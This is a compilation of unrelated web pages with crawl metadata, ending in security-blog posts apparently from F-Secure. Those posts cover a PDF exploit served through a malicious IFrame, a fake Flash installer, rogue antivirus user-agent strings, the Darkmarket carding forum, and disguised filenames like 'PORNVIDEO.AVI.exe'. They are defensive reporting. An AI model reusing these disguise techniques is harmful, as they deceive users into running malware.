Government agencies create custom software when solutions aren't available off the shelf -- you simply won't find a welfare payment system down at the local office supply store. When government agencies create software, they don't usually collaborate with agencies with similar needs, which is horribly inefficient and wasteful. But government agencies that use open source software actually enable sharing software tools among agencies with similar roles and responsibilities, creating better ROI and increased opportunity for collaboration. In essence, open source software is software that has been copyrighted and distributed under the terms of a generous licensing agreement -- typically the GNU General Public License. The agreement permits anyone to freely use, modify and redistribute software with its source code. This is in stark contrast to proprietary software, whose source codes are held secret and whose use is governed by restrictive licensing terms. It also differs from public domain software, which is expressly not copyrighted. It's easy to lose track of who really pays for software development at government agencies, and the easiest way to keep it straight is to follow the money. Your project budget is a subset of your department's budget, which is a subset of your agency's budget and so on up the ladder. The money trail stops at the taxpayer's wallet. As public employees, we have a duty to get the best return on tax dollars invested in our projects. Government agencies write software for internal use, or for use by citizens they directly serve, and it is not typically used beyond its original intent. The overall ROI in a piece of software is improved when many agencies make use of it, rather than investing more tax money into developing a similar piece of software. In short, open source gives government more bang for the taxpayer's buck. Increasing the return on tax dollars invested in the development effort is good for taxpayers. Sharing software your agency developed is clearly a windfall for the agency using your software. But what does it do for your agency? For starters, when an open source community forms around a development effort, the rewards can be astonishing. Open source software creates an environment in which developers can build on each other's successes rather than repeating each other's efforts. Why would you develop an entire program if an existing one does 80 percent of what you need? Surely it's more efficient to add the remaining 20 percent than to build the entire system from scratch. If the application is well aligned with your business needs, you can produce what's needed in a fraction of the time and cost of going it alone. Benefits are even greater when developers work cooperatively to create an application of mutual benefit. You will have more resources dedicated to a project than any one agency can afford by sharing development costs across all those contributing to the effort. The end result is higher quality, more robust software that can be created at an amazing rate. Life After Death What happens to your application when your project is canceled? On a good day, you put what you have into production and get as much use out of it as possible. On a bad day, the entire program is scrapped; the source code burned onto tape and placed on the shelf to gather dust; and the return on tax dollars invested ceases forever. When a dead application is open source, however, it can be adopted by other agencies. Major subsystems could become the building blocks for entirely new applications, which is true even for ongoing projects. Another agency may pick up where you left off and add features you wanted to include, but could never afford.
<urn:uuid:1e1c091e-3963-4315-b9c9-9461d294f645>
CC-MAIN-2017-04
http://www.govtech.com/e-government/Stumping-for-Open-Source.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279224.13/warc/CC-MAIN-20170116095119-00571-ip-10-171-10-70.ec2.internal.warc.gz
en
0.947994
706
2.59375
3
Fiber optic splice closure is the equipment used to offer room for fusion splicing optical fibers. It also provides protection for fused fiber joint point and fiber cables. There are mainly two types of closures: vertical type and horizontal type. A large variety of fiber splice closures are designed for different applications, such as aerial, duct fiber cables and direct burial. Generally speaking, they are usually used in outdoor environment, even underwater. 1. Horizontal type splice closures look like flat or cylindrical case. They provide space and protection for optical cable splicing and joint. They can be mounted aerial, buried, or for underground applications. Horizontal types are used more often than vertical type (dome type) closures. Most horizontal fiber closure can accommodate hundreds of fiber connections. They are designed to be waterproof and dust proof. They can be used in temperature ranging from -40A degree to 85A degree and can accommodate up to 106 kpa pressure. the cases are usually made of high tensile construction plastic. 2. Vertical type of fiber optic splice closures looks like a dome, thus they are also called dome types. They meet the same specification as the horizontal types. They are designed for buried applications. Applications splice closures provide room for splicing Outdoor Fiber Optic Cable together. fiber splice trays are needed too. they provide the perfect protection for outside plant fiber cable joints. fiber splice closures accept both ribbon and round fiber cables. Each type (ribbon or round cable) fits respective requirement of different fiber splicing counts. They are widely used in optic telecommunication systems. Fiber Optic Splice closure Installation Steps 1.Fiber optic splice closure kit usually includes: end plate, splice tray organizer, fiber splice tray, cover, cable grommets, grommet retainer, mounting bracket and misc. hardware. 2. Fiber Cable Sheath Preparation 1)Expose the rip cord. This step involves marking the location with a tape marker, ring-cutting the outer jacket shaving off the outer jacket to expose the rip cord. 2)Remove the outer sheath. This step involves making a longitudinal slit down the outer sheath,peeling off the outer jacket and corrugated metal, and cutting the rip cord flush with the end of the corrugated metal. 3)Rewove the inner jacket. This step involves using the rip cord under the inner jacket to slit it, cutting aramid yarns, cutting central strength member, and cleaning the filling compound. 3. Bonding and Grounding Hardware Installation This step involves sliding the cable clamp over sheath, sliding the bond shoe under the corrugated metal, placing the bond plate over the bond shoe ans securing the sheath grip. 4. Assembly of Cables to Closure The preferable location for the two main cables is in the lower end plate port. If a third or fourth cable is required, it is easier to install it in the upper end plate port as a branch cable. This fiber optic splice closure is designed for two cables in each of its two ports. If only one cable will be installed in a port, the provided rubber grommet plug is used to substitute for the second cable. 1) Install Cables to End Plate. this step involves unscrewing knob and removing grommet retainer, positioning the end plate assembly, attaching the sheath grip to dielectric cables, sliding cables and sheath grip through, and securing sheath grip to backbone. 2) Grommet Installation and External Grounding. This step involves applying Bsealant, pushing the grommets into the end plate port, and applying more B-Sealant. 3) Fiber unit Preparation and Distribution Organizer Installation. This step involves removing more loose tubes,separating each cable’s loose tube into two groups, positioning the distribution organizer, securing the loose tubes. 4) Splice Tray Installation. This step involves placing the splice tray, fastening the end of the splice tray to the organizer, and installing cables, grommets and external ground. 5) Optical Fiber Splicing. This step involves splicing holder placing, fiber splicing and fastening the splice holder lid. 5.Fiber Optic Splice Closure Cover Installation.
<urn:uuid:36979838-1bef-4cca-a0fe-db4e226fce08>
CC-MAIN-2017-04
http://www.fs.com/blog/introduction-of-fiber-optic-splice-closure.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279368.44/warc/CC-MAIN-20170116095119-00415-ip-10-171-10-70.ec2.internal.warc.gz
en
0.884548
893
2.765625
3
Thank You For Your Interest In: |White Paper – The Top 5 Myths of Data Breaches||185 KB| We live in the age of the data breach. It seems from every newspaper and on every newscast we hear about yet another breach of a computer network resulting in the theft of confidential or sensitive information. Even the media outlets themselves have become the targets of these attacks and data breaches. Within the security industry and in society in general we are in a constant search for a solution to this problem. However, many in the security industry have become so disillusioned by failure that they have adopted the opinion that a breach is inevitable and the primary focus should be on detection and response as opposed to prevention. In truth, there is no single, simple answer and giving up is not a viable alternative. The fact that there are no easy answers does not mean we have to accept defeat. And one of the first steps is to recognize that many promoted opinions about the cause of breaches and the failures of technology are actually myths. These myths obscure a clear path to increased security and better risk management. Debunking these myths is an important step to improve the effectiveness of our security defenses against future breach attempts. This paper will expose five of the biggest myths that exist about data breaches, and explain how and why they occur.
<urn:uuid:2db5361b-60cc-493f-9075-4e20d388d45f>
CC-MAIN-2017-04
https://www.firemon.com/resources/collateral/white-paper-top-5-myths-data-breaches/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279368.44/warc/CC-MAIN-20170116095119-00415-ip-10-171-10-70.ec2.internal.warc.gz
en
0.963857
269
2.65625
3
Frame rate selection has a major impact on bandwidth consumption for surveillance cameras. While most cameras have a maximum frame rate of 25 to 30 frames per second, users typically choose significantly lower frame rates, driven by a desire to minimize storage consumption. The most direct way to reduce storage is to use a lower bit rate stream for each camera with lower frame rates. A key practical question is how much bandwidth is saved as the frame rate is dropped? Lower frames rates should result in lower bit rates but how significant are those changes and does this change depending on the scene? In this report, we share our result of a series of experiments we did with 3 IP cameras (Avigilon, Axis and Sony) in 3 different scenes: (1) indoor daytime, (2) indoor dark (< 1 lux), and (3) daytime outdoor (intersection). We did tests at 1, 5, 10, 15 and 30 fps to see how bandwidth consumption varied across a variety of frame rates. We then produced a series of charts comparing bitrate vs frame rate and average frame size vs frame rate to provide two views on the relationship between these parameters. With these test results, we answer the following questions: - How does bandwidth efficiency vary with changes in the frame rate? - Are low frame rate streams inefficient? - How can you project bandwidth consumption for various frame rates? - Does different scene types impact bandwidth vs frame rate efficiency? - How does the choice of VBR vs CBR impact the relationship between bandwidth and frame rate? For background on frame rates, Pro members should review our frame rate fundamentals training. Also, for those interested in understanding the impact of bandwidth, review our sister report that examines the relationship between bandwidth and image quality.
<urn:uuid:7d422bb6-c89b-4be7-89e1-2a862d020190>
CC-MAIN-2017-04
https://ipvm.com/reports/bandwidth-vs-framerate
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281649.59/warc/CC-MAIN-20170116095121-00533-ip-10-171-10-70.ec2.internal.warc.gz
en
0.918003
355
2.515625
3
Up-front analysis is key. Have a scale drawing of your area so you can map out your AP placement. A free tool like Meraki's WiFi Stumbler will help any environment size up neighboring wireless networks that need to be worked around by showing adjacent network names, channels in use and how strong they are being felt in your space. Once you map the airspace, you can design your own access point placement. Remember that your airspace will change over time as neighbors add or remove their own access points, but you can adjust your network as needed. Estimate how many users are going to be on the wireless network at a given time. If more than 15-20 users might be on the wireless network at the same time, you'll need to plan for more access points even if just one can fill the given area with signal. Wireless is a shared medium and when you get over 20 simultaneous users, contention will become a limiting factor in performance. Determine the minimum throughput you'd like to provide. 802.11 a/g offers upto 54Mbps while 802.11n can reach, in theory 600 Mbps (though actually data rates will be much, much lower). The data rates will increase and decrease based on conditions in the airwaves. Balancing the data rate and number of users is a tricky process. Web and mail traffic might be considered lightweight, but a single YouTube video is usually around 500 Kbps. Consider what your users are likely to be doing; 10 users all streaming video might max out an 11g access point, for example. Map out the size of the area do you need to cover. APs are usually "rated" for open areas when distances are claimed. You might get 200 feet of good signal outdoors, but only a couple of rooms inside. Construction materials make effective wireless barriers, particularly in older buildings where metal screening was often used to hold plaster. Verification is a must. If you see signal falling below 70 dBm, you need another AP. You don't need to have your AP blasting at full power either. If you are at an edge, try adjusting the power levels so that you have adequate power for your area, but are also being a nice neighbor. It's also a good time to go talk to your neighbors who are using maximum power to see if they can turn it down a bit.
<urn:uuid:dec47798-ae07-4aff-90ec-936d0d835c42>
CC-MAIN-2017-04
http://www.networkcomputing.com/wireless/how-deploy-open-area-wireless/82508305?piddl_msgorder=asc
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279489.14/warc/CC-MAIN-20170116095119-00103-ip-10-171-10-70.ec2.internal.warc.gz
en
0.949377
478
2.59375
3
JVP- The Building History The National Mint Building was designed by the Chief Architect of the British Empire’s Public Works Department, Austin St. Barb Harrison, and built in 1937 as the Mandate’s official Mint. Harrison also designed other well known government buildings in Jerusalem, such as the Rockefeller Museum and the main post office on Jaffa Rd. The Mint, a classic Industrial Bauhaus design, is one of the most important industrial structures built in Palestine in the 1930’s and has inspired the design of other buildings around the country. The building served as the Mandate’s Mint util the declaration of the State of Israel in 1948, when it served the newly formed Government. It served as the National Mint util the 1960’s when it was turned into a warehouse and then finally abandoned in the 1980’s. In 2006, Erel Margalit initiated extensive preservation and renovation efforts led by Plesner Architects and formed the JVP Media Quarter in the building and neighboring train station warehouses. The unique structure became a monument in the city’s skyline, buzzing with activity 24 hours a day as employees and visitors alike enjoy an atmosphere of creativity and innovation alongside a deep respect for the history of Jerusalem and its powerful legacy. (Photos provided by David Kroyanker http://www.kroyanker.co.il/) The Mint's original entrance which was preserved and is used to this day View from the southeast of the E shaped building with a second level along the north facade View from the west. The north facade was preserved completely, including the original windows' structure and mechanisms In the courtyard, workers unpacking crates delivered from the neighboring train station
<urn:uuid:8755dc8a-1204-4bbe-98bf-886056950685>
CC-MAIN-2017-04
http://www.jvpvc.com/history
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280872.69/warc/CC-MAIN-20170116095120-00405-ip-10-171-10-70.ec2.internal.warc.gz
en
0.961667
350
3.125
3
Department of Defense The mission of the Department of Defense (DoD) is to protect and defend the United States through a balance of military and civilian power. The DoD is made up of several combatant and non-combatant agencies. The combatant agencies include our United States military departments and the non-combatant agencies include agencies such as the National Security Agency and the Defense Intelligence Agency. The primary purpose of the Department of Defense is to provide civilian control over the United States military. In doing so a set of policies and directives are put into place to establish limitations and provide structure to keep a balance between military and civilian power.
<urn:uuid:9f2012fa-fefe-4389-a704-a01a2ed32989>
CC-MAIN-2017-04
http://www.halfaker.com/department-defense
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280292.50/warc/CC-MAIN-20170116095120-00433-ip-10-171-10-70.ec2.internal.warc.gz
en
0.957619
128
2.640625
3
This is from a few weeks ago, and I only just got to it. Hackers can exfiltrate data via a cellphone and no longer need the Internet to invade and control a system, Ben Gurion University researchers say. Using a technique called air-gap network hacking, all a hacker has to do is implant the right kind of malware into a cellphone that gets within range of a computer. Hackers on the other side of the world could use cellphone-based malware to remotely access any data they want, using the electromagnetic waves emanating from computer or server hardware, with no need for an Internet connection. The concept is not new, but what’s new is the use of a cellphone to do it. Stuxnet was put on a thumbdrive to infect Iranian servers, and carried in. The new attack is light-years ahead of Stuxnet, because no physical contact is required to compromise a system. How could a mobile phone be used to hack into an air-gapped network? In a take-off of an email phishing attack, a hacker could send an unsuspecting employee in a sensitive installation a text message that looks legitimate, but contains a link to malware that surreptitiously gets installed on their cellphone. Once the malware is on the phone, it scans for electromagnetic waves which can be manipulated to build a network connection using FM frequencies to install a virus onto a computer or server. The Ben Gurion University team has demonstrated how this is done with computer video cards and monitors. With the virus installed on the system, the phone connects to it via the FM frequency, sucks information out of the server and uses the phone’s cellphone network connection to transmit the data back to hackers. All that’s needed is physical proximity to the system. The team said that one to six meters is enough. Right now, there’s little that can be done to prevent this kind of cyber-attack other than turning off the phone. As that is not a practical solution in this day and age, his team is searching for other solutions. It’s a major security risk, he said. Until a solution is found, that risk will only increase, as news of the hack spreads in the hacker community. Link to Times of Israel article with more information:
<urn:uuid:96099e66-d4d8-41f3-a8dc-975ee69d78e0>
CC-MAIN-2017-04
https://blog.knowbe4.com/bid/389195/new-cellphone-phishing-hack-pulls-data-out-of-computer-over-air
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279915.8/warc/CC-MAIN-20170116095119-00369-ip-10-171-10-70.ec2.internal.warc.gz
en
0.936139
470
2.78125
3
Two Factor Authentication, or 2FA, takes a combination of generally accepted forms of authentication to further secure your login to big sites and applications such as Facebook, Microsoft, Google, Apple iCloud and others. This is an extra layer of protection that utilizes something you know such as a password, and something only you has, such as a cell phone or fingerprint. This is not necessarily a new idea, many of us use this everyday when making purchases with a credit card and asked to enter a zip code for verification. There are 3 generally accepted factors of authentication: Something you know – such as a password Something you have – such as a hardware token like a cell phone Something you are – such as your fingerprint Two Factor Authentication takes two of the above in order to secure your log in. Such that if you have 2FA enabled on Facebook for instance, when you attempt to log into Facebook on a new device or browser you will be asked to confirm this log in with a second form of authentication which can be any of the three described above. This form of authenticating is especially advised for sites and applications that house your personal information, credit cards, location information, are tied to other accounts, and could otherwise affect your personal life such as email, social media – the list is endless! A few big names have taken head to this advice by employing 2FA, although the process is not entirely seamless, great strides have been taken to make using 2FA as easy as possible. Look for 2FA on your favorite big name sites and applications. Set up Google 2FA here Set up Apple 2FA here Set up Microsoft 2FA here If you would like to educate yourself in more detail about the information presented in this blog post please visit :
<urn:uuid:f03f7b47-145b-4dd5-aa6e-02584150a495>
CC-MAIN-2017-04
http://www.bvainc.com/two-factor-authentication-what-is-it/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280310.48/warc/CC-MAIN-20170116095120-00277-ip-10-171-10-70.ec2.internal.warc.gz
en
0.948685
357
2.953125
3
From the NYT: In an experiment published late last year, two University of Texas psychologists threw out the final exam for the 900 students in their intro psych course and replaced it with a series of short quizzes that students took on their laptops at the beginning of each class. Turns out, taking tests on a regular basis seems to be good at teaching people how to do something. This seems intuitive to me, as isn’t this what the real world application of knowledge will require? Aren’t we learning so that we can use this information? I wonder if we should basically get a lecture, or watch a video, or read a short excerpt of something, and then go into recall mode. Either building something with that knowledge, or being forced to recall it in various ways repeatedly. If I didn’t know any better, which I don’t, I’d simply say that learning should be practicing exactly what’s going to happen in the real world. And that means building with the knowledge, and recalling it.
<urn:uuid:90c1a051-d769-46f7-bd38-5a7b23c42785>
CC-MAIN-2017-04
https://danielmiessler.com/blog/testing-best-learning/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280900.71/warc/CC-MAIN-20170116095120-00093-ip-10-171-10-70.ec2.internal.warc.gz
en
0.965381
218
2.71875
3
Addressing the challenges of renewable energy on the electricity industry. In 2009, the importance of renewable energy will continue to present challenges and targets for the electricity industry across the globe. As deadlines to meet carbon emissions targets get closer and political pressure increases, many challenges remain for the industry. While many alternative energy solutions are well known, the roll-out and installation will present a number of problems. These problems are not insurmountable, however, many are expensive or require further time and energy to develop. In this Point of View, Capgemini explores the real impact of renewable energy on the electric grid, the issues companies face, and how these challenges can be overcome.
<urn:uuid:31bc55e2-a578-4d35-ad7e-b18cce7d3b9d>
CC-MAIN-2017-04
https://www.br.capgemini.com/the-impact-of-renewables-on-the-electric-grid
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279189.36/warc/CC-MAIN-20170116095119-00150-ip-10-171-10-70.ec2.internal.warc.gz
en
0.927075
136
2.59375
3
The team that broke the terabit barrier in 2009 is at it again. This time the High-Speed Optical Communications (HSOC) team at the Technical University of Denmark accomplished a record-smashing 43 terabits per second (Tbps) transfer speed over a single optical fiber with just one laser transmitter. That’s equivalent to a transfer rate of around 5.4 terabytes per second. The High-Speed Optical Communications group at the university’s photonics engineering department beat the previous record – 26 terabits per second – set by the Karlsruhe Institute of Technology in 2011. As worldwide Internet traffic grows by 40–50 percent annually, driven by the popularity of cloud services and streamed music and video applications, network vendors are struggling to meet this demand. The DTU team achieved its latest record thanks a new type of optical fiber, developed by Japanese telco NTT. The fiber contains seven cores, comprised of glass threads, instead of the single core used in standard fibers, enabling it to transfer more data in the same amount of space. Most core networks use a technology called DWDM (dense wavelength division multiplexing) to boost capacity by sending multiple channels of data at the same time, each transmitted by a different laser. Although this latest demonstration involved a single laser and a single fiber, a network built with the multi-core fibers would support much higher transfers than 43 Tbps. Stuffing so much data into a single lane will also save on energy, an important benefit considering IT networks comprise about 2 percent of global energy demands. Previously DTU researchers achieved the highest combined data transmission speed in the world, 1 petabit per second, using a setup with hundreds of lasers. The latest benchmark results have been verified and presented at the CLEO 2014 international conference.
<urn:uuid:92301f5b-1be9-4ab5-944b-e7ace7138c57>
CC-MAIN-2017-04
https://www.hpcwire.com/2014/08/06/danes-take-back-fastest-data-transfer-title/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279224.13/warc/CC-MAIN-20170116095119-00572-ip-10-171-10-70.ec2.internal.warc.gz
en
0.911241
373
2.96875
3
Google Forms makes collecting information easy, but sometimes you don’t want everyone to be able to fill out your form. Have you ever wanted to set restrictions on who could complete your Google Form? There are multiple ways of accomplishing this and the above video will walk you through two different options. The first option allows you to set permissions and identify who can complete your form. Meaning, you can designate specific people you want to complete the form with the use of a student ID, for example. This is done by creating an expression in the responses spreadsheet. Once you’ve identified people you want to fill out your form, you can create an identification column. In the video, we’ve chosen to identify students through student ID numbers. After the IDs have been created and provided to the participants, you then can build a concatenate formula. The second option is to password protect your Google Form. To do this, you will have to create two pages for your form. The first page will be a login in page where you can enable Data Validation and require an exact match. You will need to provide the password to your form participants. Once they login with the password, they will be granted access to the second page of your form where you can begin your questions. To learn more about Google Forms, see this list of articles.
<urn:uuid:bfb3dc87-1243-4e7f-8297-0d7d52f13dd6>
CC-MAIN-2017-04
https://www.bettercloud.com/monitor/the-academy/restrict-access-to-google-forms/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281574.78/warc/CC-MAIN-20170116095121-00112-ip-10-171-10-70.ec2.internal.warc.gz
en
0.915511
275
2.53125
3
Yesterday President Barack Obama announced his plans for securing cyberspace. It would have been hard to imagine George Bush giving a talk about malware and bots. And that's exactly what Obama did. From Obama, phrases like this sound perfectly natural: "we've had to learn a whole new vocabulary just to stay ahead of the cyber criminals who would do us harm -- spyware and malware and spoofing and phishing and botnets." President Obama also mentioned Conficker by name, which was interesting. The full text of his speech is available online. Another quote: "Our Information Age is still in its infancy. We're only at Web 2.0." My comments on President Obama's announcement are available in the New York Times. There's some speculation among experts. Why Facebook? Has Facebook become a keystone from which to launch and steal all of an individual's passwords (i.e. banking and commerce sites)? Once you have Facebook, can you then compromise the primary e-mail account and everything else along with it? Let's take Finland as an example. There are over one million estimated Facebook accounts and there are only 5.3 million people living in Finland. The regional network has over 544,000 members. Anything that size will be a target for scammers. Wherever good people go, miscreants will follow. So of course it's an excellent policy to maintain complex passwords that are unique to each site. Right? Here's an idea. Write down your passwords. Seriously. And once you write them down, put them in your wallet. Think about it. What else do you carry in your wallet? That's right, your bank cards. And your bank cards contain your account name and account number. That's kind of like your online account names and passwords. Only this is the key — It's a two part password. Because your account name and bank card number also requires your PIN. So take a look at this screenshot. What do you see? Passwords on a Post-it, only examples of course… non-dictionary ones at that. Keep another three common characters in your head, and you'll have complex 10 character passwords. And you can insert those extra characters in the front, middle, or end. What do we mean? It's like this. The first three characters in this example are based on the website, "aMA" represents Amazon.com. And it can be written several ways, such as "AMa" or "aMa" or "AMA", etc. A good method should be easy for you to remember. The next (or other) part, "2242" as in our example, should be something completely random. This is the part that you really need to write down and keep safe so that you don't forget it. And then you should use a method to add three more characters (your "PIN") to every password. Something such as "35!" So the full password then becomes "aMA224235!" or "aMA35!2242" or "35!aMA2242". Our other example would be "gMA35N135!". Your PIN should never be written down, keep that bit of information in your head. Just like your bank card's PIN. Note that our example does not include an e-mail address on the Post-it. What happens if your wallet is stolen? You call the bank and cancel your cards. And what about your Post-it? If it doesn't include your e-mail address or your PIN, you can reset your passwords in a timely fashion on a new piece of paper. You're good to go. Using this methodology, you can maintain complex and unique passwords, and still have something handy for when you forget them. Because we all do forget stuff from time to time. And if you're phished on one site, such as Facebook, your other accounts aren't sharing the same password. Oh, one last piece of advice. Don't put the Post-it on your monitor! And not on the underside of your keyboard either… everyone's familiar with that location too. Are you a gadget geek? Do you often seek advice from Gadget Advisor before making a purchase? One of our Web Security Analysts discovered a malicious IFrame on the popular tech website that redirects visitors to a malicious website. If the site detects a PDF browser plugin for Adobe Acrobat and Reader, it loads a specially-crafted malicious PDF file that exploits a stack-based buffer overflow vulnerability (CVE-2008-2992). Below are the readable codes contained within the malicious PDF file. This attack is targeted against older, unpatched versions, as the latest Adobe updates have already fixed this problem. More information and the updates can be found on adobe.com at http://www.adobe.com/support/security/bulletins/apsb08-19.html. But look closely and you'll see that the image above is for Mac Protection. We used to have a Mac solution back in the days of sneakernets. The updates were distributed via floppies. This new Mac Protection (with antivirus) is part of our Technology Preview program and you can download it from our Beta Programs page. An Intel processor based Mac with OS X version 10.5 (Leopard) is a requirement. Macs are popular, with consumers… and also with malware authors. There's plenty of Zlob codec trojans that will infect a Mac if given the chance. Mac's popularity is such that we feel it's time once again for our own Mac solution. Give it a try — Cheers. We've moved. Our Kuala Lumpur Security Lab that is… We successfully transplanted the entire Kuala Lumpur office to new premises over the weekend. The new location offers much more room for expansion as we continue to grow. Here's an exterior shot of the office building — "Menara F-Secure" (F-Secure Tower) is the second tower from the right. And here's a shot of the (much larger) Security Lab, before all the Analysts completed setting up their workstations: There were still boxes, cables and other paraphernalia lying around at the time, as you can see in the background. Today though everything has been set up, all the boxes are being cleared and everyone is getting comfortable again. During the entire move, we were able to maintain full response services by creatively working around the organized turmoil, but it's good to finally settle down and get to work in the new lab. So as an unofficial salute to mark the end of the move: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; AntivirXP08; .NET CLR 1.1.4322; .NET CLR 2.0.50727) Do you see it? Right there in the middle, "AntivirXP08". What is that all about? Some rogues modify the browser's user agent. We've seen hundreds of AntivirXP08 string variations. The modified string is possibly used to identify the affiliates responsible for the installation which drives "business" to the rogue's website. Modified user agents could also be used deliver different content. A victim with AntivirXP08 doesn't need to be convinced to download an installer, instead they can be targeted to complete the scam and to buy the rogue. How many infected user agents are out there? Toni examined one of our sinkholes and its April 2009 logs contained 63,000 unique IP addresses using agents that contain AntivirXP08. 63 thousand. That's a lot of infections, right? And that doesn't include other strings we've seen such as "Antimalware2009". One of our Web Security Analysts came across a website (118,000 ranking in Alexa) that drives users into installing a fake Adobe Flash Player file. The site prompts a message requesting the user download "a new version of Adobe Flash Player" in order to view a video on the site. On clicking "Continue", visitors are taken to this page: Looks pretty authentic, right? It even offers to download an "install_flash_player.exe" file for you. The analyst was using a Linux system though, so this seemed slightly odd. Turns out the site is a (pretty good) fake. Unless a visitor takes a hard look at the address bar, it's pretty easy to be fooled. The downloaded installer also looks like the original Adobe Flash Player installer, though the checksum and digital signatures point out the difference. install_flash_player.exe version 10.0.22.87 md5: 51F26C0051E97A91145971FE5BC632FF Do you enjoy installing and trying out new software? Do you want the chance to win an iPod? Yes? Okay, then keep reading… Our most recent build of F-Secure Internet Security Technology Preview (ISTP) was released last Friday, version 9.40 build 172. Some big changes are being implemented into our products and ISTP 9.40 is our first look at them. The Security Lab has been testing 9.40 and we'd like to encourage our blog readers to do so as well. (Download Beta Programs) The most immediate change you'll notice is the first-level GUI. It is quite different from our present design and will eventually the basis of the entire GUI. It's still evolving so feedback is very formative at this point, if not this year's releases, then next. There are also numerous changes in the technology: • Scanning performance improvements • Boot optimization • Processes optimization • DeepGuard enhancements • New Spam Control • New network-based Parental Control Here's an example of our new Browsing Protection options. Exploit Shield and a network based reputation protection is now integrated (IE and Firefox). Known bad sites will be blocked, and unknown sites will be "shielded" against. And when the Shield is activated, we'll learn about yet another bad site… and that builds a protective feedback loop. The next visitor will be blocked from visiting rather than shielded. Those of you familiar with our current lineup know that DeepGuard is found within our Real-time scanning "System Control" settings. DeepGuard is now uncoupled from Real-time scanning options and includes enhanced process monitoring. ISTP's DeepGuard utilizes our "Cloud" of course. And known malicious applications are blocked on the basis of server queries. If you're offline, DeepGuard can automatically block malicious applications using our latest behavioral engine technology. Alright, so there are a number of important changes and there's lots of testing and work to be done still. And even though we're testing internally, you know that real-world testing by actual users is very important to the process. Another cool thing about the technology… it's updated automatically. Which means that if you are running ISTP 9.30 — It should update itself to Build 172 today via our update channel. If it doesn't soon, that's the kind of feedback we want to read about. One additional note that's very important to us here in the Lab — this ISTP 9.40 release includes lots of changes to our detection technologies. They are more proactive and heuristic than in previous product releases. (DeepGuard being a good example.) This should enhance our detection of undefined/unknown malware. If you discover any new samples, we want them! Also, if you encounter a detection that's too aggressive, you can help us with feedback there as well. FBI agent Keith Mularski gave an interview yesterday to Elinor Mills. In the interview he talks for the first time about the background of the infamous Darkmarket.ws sting operation. Special Agent Mularski worked undercover for two years, operating a message forum for online criminals, posing as one of them. The operation ended last fall with 60 arrests around the world. The most famous arrest to come out of this sting operation was the arrest of Çağatay Evyapan in Turkey. Mr. Evyapan, known online as "cha0" was arrested in a raid by a special unit of the Turkish police. Here's a video of cha0's arrest from our Security Wrapup: The Darkmarket case has received a lot of media coverage. But what did the actual site look like when it was still operational? For the first time, we're now publishing a series of screenshots taken of Darkmarket.ws. We took these pictures mostly in 2006 and 2007. They detail how this forum was used to conduct all kinds of online crimes. Login page of Darkmarket.ws Here's a user who is interested in buying access to 3000-4000 infected machines a week. "Get more $$$ for your logs" - this user is advertising cashing services for various banks, used to steal money from online bank accounts. Credentials for these accounts have been stolen via keyloggers. User 'aloaster' has hacked several online shops. Now he's selling administrator access to them. Distributed-denial-of-service attacks for sale. "This is a great deal on DDOS attacks and cannot be beat by anyone!" 200 "dove" stickers for $1500. "Dove stickers" are VISA credit card holograms. We got plenty of good comments on the previous blog post about Windows 7, including feedback from people who are actually working in the Explorer development team at Microsoft. Many of the comments included questions on the topic, so here's a Q&A: Q: What is this all about? A: It's about Windows, by default, hiding file extensions such as .EXE. Virus writers exploit this by creating malicious files with double-extensions (PICTURE.JPG.EXE). Such a file would typically also use a misleading icon. Q: How long has Windows Explorer been hiding file extensions "For known file types"? A: Since Windows NT. Q: Why do they do it? A: We don't know. Q: Is this a real risk? If user already has such a file on his hard drive, it's too late, right? A: Not really. The file could have come from the Internet, from a file share or a removable drive and the user hasn't necessarily executed it yet. Q: But if the file came from the Internet, Explorer will warn you that it came from an "Untrusted Zone"! A: Only if you use Internet Explorer to browse the web and Outlook to download your e-mail attachments. There are plenty of other ways to download files from the net: 3rd party web and e-mail clients, BitTorrent and other P2P clients, chat programs etc. Also, you can't rely on such warning dialogs if the file is on a network share or an a USB drive. Q: There is no problem. Even in your own screenshot the file is labeled by Explorer as "Application"! Thus, nobody would click on it. Even though the file is called something.txt. And it has the icon of a text file. A: Right… Q: Do real worms really use such filenames? A: Oh yes. They typically spread by copying themselves with tempting filenames to random folders on removable drives or network shares, with filenames along these lines: E:\PRESENTATION.PPT.exe E:\DOCUMENT.DOC.exe E:\PORNVIDEO.AVI.exe Etc. Many would click on these, especially if the icon of the file looks like a document icon — and when Windows hides the ".exe" part of the name. Q: So, the solution is turn off "Hide extensions for known file types" in Explorer settings? A: Yeah. Q: Will that make all file extensions visible? A: Well, no. There are executable extensions that will STILL be hidden even if you turn the option off. Q: What? A: For example PIF. This file type was meant to be a shortcut to old MS-DOS programs. Problem is, you can rename any modern Windows Executable to .PIF and it will happily run when double-clicked. For example, the Scamo worm uses exactly this flaw, dropping files such as these: HARRY POTTER 1-6 BOOK.TXT.pif ANTHRAX.DOC.pif RINGTONES.MP3.pif BRITNEY SPEARS FULL ALBUM.MP3.pif EMINEM BLOWJOB.JPG.pif VISTA REVIEW.DOC.pif OSAMA BIN LADEN.MPG.pif NOSTRADAMUS.DOC.pif Q: How do you I make PIF files visible then? A: Via a registry key called "NeverShowExt". We'd link you to an article in the Microsoft Knowledgebase… except we couldn't find any. But here's a Web page on the topic, from GeoCities, made by some hobbyist a couple of years ago. Maybe it's the best source of information on the topic. Q: Do you still expect Microsoft to change the behavior of Explorer in Windows 7? A: No, not really. Bottom line: We still fail to see why Windows insists on hiding the last extension in the filename. It's just misleading. Our readership may be interested in this vulnerability description regarding a ZIP and RAR archive evasion vulnerability in our products. On clients and servers, the worst case is a delay in detection and so it's considered to be low severity. We've covered targeted attacks manytimesin the past and we've also covered PDF and vulnerabilities in 